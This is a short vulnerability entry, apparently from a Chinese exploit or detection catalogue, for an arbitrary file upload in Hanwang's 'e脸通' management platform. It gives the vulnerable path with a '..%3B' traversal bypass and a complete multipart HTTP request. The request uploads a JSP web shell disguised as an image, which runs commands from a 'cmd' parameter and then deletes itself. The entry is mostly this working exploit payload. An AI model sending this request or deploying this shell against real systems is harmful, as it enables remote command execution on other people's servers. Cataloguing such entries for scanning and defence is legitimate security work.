vendor = "汉王"
name = "汉王e脸通综合管理平台 uploadBlackListFile.do 任意文件上传"
type = "RCE"
version = "未知"
path = "/manage/mobiVist/..%3B/systemBlackList/uploadBlackListFile.do"
detail = "POST /manage/mobiVist/..%3B/systemBlackList/uploadBlackListFile.do HTTP/1.1 ------WebKitFormBunddaryFfJZ4P1AZBixjELj Content-Disposition: form-data; name=\"file\"; filename=\"123.jsp\" Content-Type: image/jpeg <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print(\"<pre>\");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print(\"</pre>\");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> ------WebKitFormBunddaryFfJZ4P1AZBixjELj"
fix = "缺省规则可检出"
date = "0725"
label = "1day"
verifier = "AdySec"
